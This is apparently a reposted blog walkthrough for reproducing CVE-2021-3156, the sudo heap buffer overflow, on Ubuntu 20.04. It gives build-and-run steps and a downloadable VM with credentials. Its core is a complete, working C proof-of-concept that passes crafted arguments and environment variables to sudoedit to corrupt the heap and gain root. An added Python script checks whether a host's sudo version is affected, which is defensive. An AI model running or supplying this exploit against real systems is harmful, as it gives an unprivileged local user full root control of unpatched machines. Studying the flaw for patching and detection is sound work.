CVE-2021-3156: Sudo heap buffer overflow vulnerability, reproduction walkthrough

At present the exp runs stably on Ubuntu 20.04; other Linux distributions have not been tested.

The environment has been uploaded to Baidu Netdisk; follow the official account and reply "sudo" to receive the download link.
The virtual machine username/password is vagrant/unicodesec

Reproduction process

From the root directory, enter the CVE-2021-3156 folder, run make to compile the project, then run sudo-hax-me-a-sandwich

The process is shown in the figure below

The exp code is as follows

#include <stdio.h>
#include <unistd.h>

/* Path to the setuid sudoedit binary that the PoC executes */
#define SUDOEDIT_PATH "/usr/bin/sudoedit"

int main(int argc, char *argv[]) {
	// CTF quality exploit below.
	// Arguments ending in a lone backslash are what reach the vulnerable copy loop.
	char *s_argv[]={
		"sudoedit",
		"-u", "root", "-s",
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\",
		"\\",
		"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\\",
		NULL
	};

	// Environment handed to sudoedit; the LC_* values shape the heap layout.
	char *s_envp[]={
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"X/P0P_SH3LLZ_", "\\",
		"LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
		"LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
		"LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAA",
		NULL
	};

	printf("**** CVE-2021-3156 PoC by blasty <peter@haxx.in>\n");

	// Replace the current process with sudoedit using the crafted argv/envp
	execve(SUDOEDIT_PATH, s_argv, s_envp);

	return 0;
}
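Before running the exp, or after applying a fix, it is useful to know whether the host's sudo falls in the affected range at all. The following is an added example (not part of the original post or of blasty's PoC) that parses the output of sudo --version and classifies it against the affected ranges published in the sudo advisory: legacy 1.8.2 through 1.8.31p2 and stable 1.9.0 through 1.9.5p1, fixed in 1.9.5p2. The sample version strings embedded in the block are constructed for illustration.

```python
import re
import subprocess

# Affected ranges for CVE-2021-3156 (inclusive), as (major, minor, patch, p-level).
# Legacy branch 1.8.2 .. 1.8.31p2, stable branch 1.9.0 .. 1.9.5p1; fixed in 1.9.5p2.
AFFECTED_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]

# First line of `sudo --version` looks like "Sudo version 1.8.31p2"; the "pN" suffix is optional.
VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(output):
    """Return (major, minor, patch, plevel) from `sudo --version` text, or None if absent."""
    m = VERSION_RE.search(output)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_affected(version):
    """True if the upstream version tuple lies inside an affected range."""
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES)


def classify(output):
    """Map raw `sudo --version` output to 'affected', 'not affected' or 'unknown'."""
    version = parse_sudo_version(output)
    if version is None:
        return "unknown"
    return "affected" if is_affected(version) else "not affected"


def check_local_host():
    """Run sudo --version on this machine and classify it (requires sudo on PATH)."""
    proc = subprocess.run(["sudo", "--version"], capture_output=True, text=True)
    return classify(proc.stdout)


if __name__ == "__main__":
    # Constructed sample outputs, not captured from a real host.
    samples = {
        "ubuntu-20.04-style": "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n",
        "last-legacy-vuln":   "Sudo version 1.8.31p2\n",
        "fixed-release":      "Sudo version 1.9.5p2\n",
        "pre-bug-release":    "Sudo version 1.8.1\n",
    }
    for name, text in samples.items():
        print(f"{name:20s} {text.splitlines()[0]:28s} -> {classify(text)}")
```

Caveat for practitioners: distributions often backport the fix without bumping the upstream version string, so a version that this check reports as "affected" may already be patched; confirm against the package changelog or the distro security advisory rather than relying on the version tuple alone.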

Original article: https://www.cnblogs.com/potatsoSec/p/14350791.html